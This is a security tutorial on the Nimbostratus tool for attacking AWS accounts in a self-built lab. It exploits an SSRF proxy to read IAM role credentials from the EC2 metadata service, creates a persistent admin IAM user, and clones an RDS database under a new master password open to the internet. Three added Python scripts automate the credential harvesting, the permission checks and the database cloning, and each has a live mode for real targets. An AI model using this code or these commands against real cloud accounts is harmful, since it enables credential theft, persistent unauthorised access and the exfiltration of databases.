Introduction

Nimbostratus is a tool developed by Andres Riancho for fingerprinting and exploiting Amazon cloud infrastructures. It uses a server-side request forgery (SSRF) weakness in a web application, for example an unvalidated HTTP proxy endpoint, to reach the instance metadata service that every EC2 instance can query, and enumerates the instance and the credentials exposed there. The toolset can be exercised against nimbostratus-target, which sets up a legal environment of your own in which the enumeration can be performed. If you were wondering what Nimbostratus means, it is the name of an actual cloud. In this article, we will see how to install Nimbostratus and nimbostratus-target, set up the target environment and then enumerate the target for further exploitation.

Installation

Installing Nimbostratus

git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt

Installing nimbostratus-target

sudo apt-get install python-mysqldb
git clone git@github.com:andresriancho/nimbostratus-target.git
cd nimbostratus-target
pip install -r requirements.txt

Prerequisites

Amazon AWS account:

The primary requirement for testing Nimbostratus is an AWS account and a set of access keys. A free-tier account is enough, but read through the free-tier limits first to avoid unexpected charges; the RDS steps later in this article in particular create an extra database instance and snapshot.

Creating a user:

To create a user, select Users in the left-hand pane of the IAM console. Create a new user with Programmatic access. On the permissions page select Attach existing policies directly and attach a policy such as AdministratorAccess. Review the chosen options and create the user. Administrator rights are convenient for a throwaway lab account; do not hand them out this way in a real environment.

Creating your access keys:

These are the access keys you will use to administer the lab account. Once the user is created you are shown its credentials, which consist of an access key ID and a secret access key; the secret is displayed only once, so save it. You can later view the access key ID (but not the secret) by selecting the user.

Boto library:

Boto is a Python package that provides interfaces to Amazon Web Services. Nimbostratus is built on the legacy boto library (not boto3), which targets Python 2.6 and 2.7, so run the tool under Python 2.

Usage

Dump EC2 meta-data

Each time an EC2 instance starts, AWS makes an instance metadata service available to it at http://169.254.169.254/, reachable only from the instance itself. The metadata includes the AMI ID, the instance ID and type, the private IP address, the region and availability zone, the instance profile (IAM role) and, under iam/security-credentials/, the temporary credentials for that role.

This function depends on the metadata service and on a web application with an HTTP proxy (SSRF) vulnerability running on the instance. Because the application makes the request on our behalf, we can use it to send requests to the metadata service from the attacker machine. For this demonstration, we will set up a simple Ubuntu instance running Apache and PHP with a vulnerable web app that exposes an unvalidated proxy function. One caveat: AWS now also offers IMDSv2, which requires a session token obtained with a PUT request before any GET is answered. An instance configured to require IMDSv2 will not respond to the plain GET requests a proxy like this forwards, so the technique below only works where IMDSv1 is still enabled.

Setting up the target instance

In this demo, we will build our own target rather than using nimbostratus-target; the same operations work against an instance set up with nimbostratus-target. The first step is to create an IAM role and launch a new Ubuntu EC2 instance from the EC2 console with that role attached. The role's instance profile is what causes temporary credentials to appear in the metadata service.

Next, we have to set up a vulnerable web app on the target machine. For this demo, we will create a PHP file with an unvalidated proxy function, using a simple PHP proxy script (greenido's cUrl_proxy.php, fetched from the gist below) as index.php inside /var/www/html.

Log into the instance through ssh and run the following steps:

sudo apt install apache2
sudo apt install php
sudo chmod -R a+rw /var/www
cd /var/www/html
curl https://gist.githubusercontent.com/greenido/2689639/raw/d95439f6dff5b8d0964366e69106226133900f9b/cUrl_proxy.php >> index.php
sudo service apache2 restart

Now we have an EC2 instance running a vulnerable HTTP web proxy. greenido's PHP script takes a ‘url’ parameter containing the URL to be fetched through the proxy, and does not validate it.

We can test this by opening the instance's public IP address in a browser on our own machine (the attacker's machine), for example http://<public-ip>/index.php?url=http://169.254.169.254/latest/meta-data/ , which should return the top-level metadata listing.

Fingerprinting using dump-ec2-metadata function

Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.

Nimbostratus has a Python file, core/utils/mangle.py, that has to be updated with the target URL. Its mangle function rewrites every URL the tool wants to fetch into a request that goes through the vulnerable proxy.

Insert the target's vulnerable proxy URL in the VULN_URL variable and save the file. Now, let's run the dump-ec2-metadata function using the updated mangle function.

./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle

Nimbostratus queries the instance's metadata service through the proxy and gathers all the data that is available.

We can see that the dump-ec2-metadata function dumps everything the metadata server exposes. The output also contains the juicy part: the temporary access key ID, secret key and session token of the IAM role attached to this instance. These role credentials expire and are rotated automatically, so use them promptly.

Dump credentials:

This function enumerates the target's metadata service using the mangle function and retrieves any access key credentials found there.

./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle

Once we have the temporary keys of the IAM role attached to the instance, we can enumerate the permissions granted to that role using the dump-permissions function.
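The enumeration that dump-ec2-metadata and dump-credentials perform through the mangle function, as an added example of my own rather than code from Nimbostratus. It assumes a proxy that takes its destination in a `url` GET parameter (as greenido's script does), a made-up target address in VULN_URL, and an instance that still answers IMDSv1. A constructed metadata tree stands in for the live service so the script runs offline; the final check shows what an IMDSv2-only instance looks like from this side, namely an empty dump.

```python
"""Added example, not Nimbostratus's own code: enumerate the EC2 metadata
service through an unvalidated HTTP proxy. Assumptions: the proxy takes the
destination in a `url` GET parameter (greenido's cUrl_proxy.php does), VULN_URL
is a made-up target, and the instance still answers IMDSv1 plain GETs."""
import json
import urllib.parse

METADATA = "http://169.254.169.254/latest/meta-data/"
VULN_URL = "http://203.0.113.10/index.php?url="  # hypothetical target

def mangle(url, vuln_url=VULN_URL):
    """Rewrite a metadata URL into a request the proxy forwards; this is the
    job of mangle() in core/utils/mangle.py."""
    return vuln_url + urllib.parse.quote(url, safe="")

def walk_metadata(fetch, base=METADATA):
    """Recursively list the tree. fetch(url) returns the body as str or None
    on error; IMDS marks sub-directories with a trailing '/'."""
    found, pending = {}, [base]
    while pending:
        url = pending.pop()
        body = fetch(mangle(url))
        if body is None:
            continue
        if not url.endswith("/"):
            found[url[len(base):]] = body
            continue
        for entry in body.splitlines():
            entry = entry.strip()
            if not entry:
                continue
            if "=" in entry:  # "0=keyname" under public-keys/ means dir "0/"
                entry = entry.split("=", 1)[0] + "/"
            pending.append(url + entry)
    return found

def extract_credentials(found):
    """Role credentials live under iam/security-credentials/<role>."""
    prefix, creds = "iam/security-credentials/", []
    for path, body in found.items():
        if not path.startswith(prefix):
            continue
        try:
            data = json.loads(body)
        except ValueError:
            continue
        if "AccessKeyId" in data:
            creds.append({"role": path[len(prefix):],
                          "access_key": data["AccessKeyId"],
                          "secret_key": data["SecretAccessKey"],
                          "token": data.get("Token"),
                          "expiration": data.get("Expiration")})
    return creds

# Constructed stand-in for an IMDSv1 instance with a role attached; the values
# are invented but shaped like the real service's responses.
FAKE_IMDS = {
    METADATA: "ami-id\ninstance-id\niam/\npublic-keys/\n",
    METADATA + "ami-id": "ami-0123456789abcdef0",
    METADATA + "instance-id": "i-0123456789abcdef0",
    METADATA + "iam/": "info\nsecurity-credentials/\n",
    METADATA + "iam/info": '{"Code": "Success", "InstanceProfileArn": "arn:aws:iam::123456789012:instance-profile/demo-role"}',
    METADATA + "iam/security-credentials/": "demo-role\n",
    METADATA + "iam/security-credentials/demo-role": json.dumps({
        "Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAEXAMPLEEXAMPLE12",
        "SecretAccessKey": "EXAMPLESECRETKEYEXAMPLESECRETKEYEXAMPLE",
        "Token": "EXAMPLESESSIONTOKEN", "Expiration": "2018-01-01T06:00:00Z"}),
    METADATA + "public-keys/": "0=demo-key\n",
    METADATA + "public-keys/0/": "openssh-key\n",
    METADATA + "public-keys/0/openssh-key": "ssh-rsa AAAAB3NzaC1yc2E... demo-key",
}

def fake_proxy_fetch(mangled_url):
    """Simulate a GET through the proxy: unwrap `url`, answer from the tree."""
    query = urllib.parse.urlparse(mangled_url).query
    target = urllib.parse.parse_qs(query).get("url", [None])[0]
    return FAKE_IMDS.get(target)  # unknown path -> None, like a 404

def real_proxy_fetch(mangled_url):
    """Fetch through the live target (only against an instance you own)."""
    import urllib.request
    try:
        with urllib.request.urlopen(mangled_url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except (OSError, ValueError):
        return None

if __name__ == "__main__":
    tree = walk_metadata(fake_proxy_fetch)
    for path in sorted(tree):
        print("%-40s %s" % (path, tree[path][:50]))
    for cred in extract_credentials(tree):
        print("role %(role)s: key %(access_key)s, expires %(expiration)s" % cred)
    # An IMDSv2-only instance refuses every token-less GET: the dump is empty.
    if not walk_metadata(lambda _url: None):
        print("empty dump: IMDSv2 enforced or proxy cannot reach 169.254.169.254")
```

Swap `fake_proxy_fetch` for `real_proxy_fetch` (with VULN_URL pointing at your own lab instance) to run it against the live proxy; an empty result where the instance clearly has a role attached is the signature of IMDSv2 being required.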

Dump permissions:

This function dumps all permissions for the provided credentials. It is best used right after dump-credentials, to learn which permissions are available to you. Assuming the IAM role has a lenient policy, a successful run looks like this:

./nimbostratus  dump-permissions --access-key=**************PXXQ --secret-key=******************************** --token ********************************************
Create a new user:

During exploitation, if you obtained credentials of the account root or of an IAM role with an administrative policy attached, they allow you to create a new IAM user. This function creates one, gives the new user permission to access all Amazon resources, and returns its access key and secret. It assigns a random name to the user and attaches a policy which looks like this:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
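The policy above grants everything, but the roles you actually land on after dump-permissions are usually narrower, and reading their statements by hand is error-prone. The following is an added example, not part of Nimbostratus, that applies IAM's decision logic locally (an explicit Deny wins, then any matching Allow, otherwise implicit deny) to the create-iam-user policy above and to a constructed read-only policy, and checks the actions the later steps of this article need. The account ID, instance names and READONLY_POLICY are made up.

```python
"""Added example (not Nimbostratus code): evaluate IAM policy documents
locally. Action names match case-insensitively; '*' and '?' are the only
wildcards. READONLY_POLICY and every ARN here are constructed for the demo."""
import re

ADMIN_POLICY = {  # the policy create-iam-user attaches
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

READONLY_POLICY = {  # constructed: read-only with one Deny carve-out
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ec2:Describe*", "rds:Describe*"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::audit-logs/*"},
        {"Effect": "Deny", "Action": "rds:*",
         "Resource": "arn:aws:rds:us-west-2:123456789012:db:prod-*"},
    ],
}

def _as_list(value):
    """IAM lets Action/Resource be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _glob(pattern, value, fold_case=False):
    """IAM wildcard match: '*' is any run of characters, '?' one character."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                    for c in pattern)
    flags = re.IGNORECASE if fold_case else 0
    return re.fullmatch(regex, value, flags) is not None

def statement_applies(stmt, action, resource):
    """True when Action/NotAction and Resource/NotResource both cover the request."""
    actions = _as_list(stmt.get("Action"))
    not_actions = _as_list(stmt.get("NotAction"))
    if actions:
        if not any(_glob(a, action, True) for a in actions):
            return False
    elif not_actions:
        if any(_glob(a, action, True) for a in not_actions):
            return False
    else:
        return False
    resources = _as_list(stmt.get("Resource"))
    not_resources = _as_list(stmt.get("NotResource"))
    if resources:
        return any(_glob(r, resource) for r in resources)
    if not_resources:
        return not any(_glob(r, resource) for r in not_resources)
    return False

def is_allowed(policies, action, resource):
    """Combine every attached policy: Deny beats Allow, no match means deny."""
    allowed = False
    for policy in policies:
        for stmt in _as_list(policy.get("Statement")):
            if not statement_applies(stmt, action, resource):
                continue
            if stmt.get("Effect") == "Deny":
                return False
            if stmt.get("Effect") == "Allow":
                allowed = True
    return allowed

# Requests worth checking right after dump-credentials: the actions each later
# step in this article needs (resource ARNs are constructed).
POST_EXPLOITATION_CHECKS = [
    ("iam:CreateUser", "arn:aws:iam::123456789012:user/*"),
    ("iam:PutUserPolicy", "arn:aws:iam::123456789012:user/*"),
    ("rds:DescribeDBInstances", "arn:aws:rds:us-west-2:123456789012:db:testdb"),
    ("rds:CreateDBSnapshot", "arn:aws:rds:us-west-2:123456789012:db:testdb"),
    ("rds:RestoreDBInstanceFromDBSnapshot", "arn:aws:rds:us-west-2:123456789012:db:*"),
    ("rds:ModifyDBInstance", "arn:aws:rds:us-west-2:123456789012:db:*"),
]

def summarize(policies, checks=POST_EXPLOITATION_CHECKS):
    """Map each checked action to its allow/deny verdict under `policies`."""
    return {action: is_allowed(policies, action, resource)
            for action, resource in checks}

if __name__ == "__main__":
    for name, policy in (("admin", ADMIN_POLICY), ("readonly", READONLY_POLICY)):
        for action, verdict in summarize([policy]).items():
            print("%-9s %-38s %s" % (name, action, "ALLOW" if verdict else "deny"))
```

Feed it the policy documents dump-permissions prints for a role and the verdict table tells you immediately whether create-iam-user and snapshot-rds are even worth attempting with those credentials. Conditions, permission boundaries and service control policies are not modelled here.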

We will execute this command and demonstrate its function:

./nimbostratus -v create-iam-user --access-key **************UFUA --secret-key **************************************DDxSZ --token ****************************************tecaoI

We can see the new user in the IAM console.

This user account can be used for further exploitation and for maintaining access to the resources. Bear in mind that an extra IAM user is also an easy thing for the account owner to spot.

Create a Database Snapshot:

Amazon RDS is Amazon Relational Database Service (Amazon RDS) which makes it easy to set up, operate, and scale a relational database in the cloud. It provides cost-efficient and resizable capacity while automating time-consuming administration tasks such as hardware provisioning, database setup, patching and backups.

For testing this section, we will have to create a DB instance in RDS. Make sure you follow the details in https://aws.amazon.com/rds/free/ to create a DB instance under Amazon Free Tier.

The snapshot-rds function creates a snapshot of a DB instance running in Amazon RDS and restores that snapshot on a new DB instance with a user-provided master password. This lets you read the contents of the database without knowing the original master password. Please note that the latest AWS API versions do not let the tool modify the VPC information of the DB instance; use API versions between 2012-01-15 and 2012-10-31 for that functionality.

We need to know whether a DB instance is running in the account, its name and its region. We will use the admin user created with the create-iam-user function in the previous step. We also provide the master password for the cloned DB instance, which we can use later to connect to it.

./nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-key *****************************yDDxSZ --token ************************************************K2g2QU= --rds-name testdb --password ********* --region us-west-2

This creates a snapshot and restores it as a separate instance in RDS.

Nimbostratus can also configure network access (the VPC and security-group settings) on the restored instance so that anyone on the internet can connect to it as the master user with the password provided.

This cloned RDS instance can then be reached remotely from the attacker machine using the instance endpoint and the password we provided, and its contents used for further exploitation.
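The snapshot, restore and password-change sequence described above, written as an added example against boto3's RDS client rather than taken from Nimbostratus. The names (testdb, the security group ID, the new password) are assumptions; FakeRDS is a constructed stand-in that records the calls so the function can run offline, and the same function works unchanged with a real boto3.client('rds') and credentials in the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN environment variables.

```python
"""Added example (not Nimbostratus code): the sequence behind snapshot-rds as
boto3 RDS calls. The restored copy keeps the source's master password, which
we do not know, so the ModifyDBInstance step is what actually grants access.
Instance, security-group and password values are made up for the demo."""
import time

def clone_rds_instance(rds, source_id, new_password,
                       security_group_ids=None, suffix=None, wait=True):
    """Return (clone_identifier, endpoint_address) for a copy of source_id.

    Needs rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot,
    rds:ModifyDBInstance and rds:DescribeDBInstances in the target account."""
    suffix = suffix or time.strftime("%Y%m%d%H%M%S")
    snapshot_id = "%s-snap-%s" % (source_id, suffix)
    clone_id = "%s-clone-%s" % (source_id, suffix)

    rds.create_db_snapshot(DBInstanceIdentifier=source_id,
                           DBSnapshotIdentifier=snapshot_id)
    if wait:  # snapshots of a busy instance can take many minutes
        rds.get_waiter("db_snapshot_completed").wait(DBSnapshotIdentifier=snapshot_id)

    restore = {"DBInstanceIdentifier": clone_id,
               "DBSnapshotIdentifier": snapshot_id,
               "PubliclyAccessible": True}  # give the clone a public endpoint
    if security_group_ids:  # a group whose inbound rule opens the DB port
        restore["VpcSecurityGroupIds"] = security_group_ids
    rds.restore_db_instance_from_db_snapshot(**restore)
    if wait:
        rds.get_waiter("db_instance_available").wait(DBInstanceIdentifier=clone_id)

    # Replace the inherited (unknown) master password with one we control.
    rds.modify_db_instance(DBInstanceIdentifier=clone_id,
                           MasterUserPassword=new_password,
                           ApplyImmediately=True)
    desc = rds.describe_db_instances(DBInstanceIdentifier=clone_id)
    return clone_id, desc["DBInstances"][0]["Endpoint"]["Address"]

class FakeRDS:
    """Records every call instead of talking to AWS (constructed test double);
    get_waiter() returns self so the following .wait() is recorded as well."""

    def __init__(self):
        self.calls = []

    def __getattr__(self, name):
        def method(*args, **kwargs):
            self.calls.append((name, args, kwargs))
            if name == "get_waiter":
                return self
            if name == "describe_db_instances":
                ident = kwargs["DBInstanceIdentifier"]
                return {"DBInstances": [{"DBInstanceIdentifier": ident,
                        "Endpoint": {"Address": ident + ".example.rds.amazonaws.com",
                                     "Port": 3306}}]}
            return {}
        return method

    def called(self, name):
        """Keyword arguments of the first recorded call to `name`."""
        return next(kw for n, _args, kw in self.calls if n == name)

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # usage: python clone_rds.py <source-db-id> <new-password>
        import boto3  # credentials come from the AWS_* environment variables
        client = boto3.client("rds", region_name="us-west-2")
        print(clone_rds_instance(client, sys.argv[1], sys.argv[2]))
    else:
        fake = FakeRDS()
        print(clone_rds_instance(fake, "testdb", "N3wMasterPassw0rd!",
                                 ["sg-0123456789abcdef0"], suffix="demo"))
        for name, _args, kwargs in fake.calls:
            print(name, kwargs)
```

Every one of these calls is recorded by CloudTrail under the credentials you used, and the snapshot and clone persist (and cost money) until deleted, so clean up with delete_db_instance and delete_db_snapshot once the lab is done.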

Conclusion

Nimbostratus is a handy post-exploitation tool for enumerating and fingerprinting AWS resources. It can also exploit instances that run tools such as Celery with insecure default configurations. Thank you for reading! – Setu Parimi, Steve George & Indranil Roy
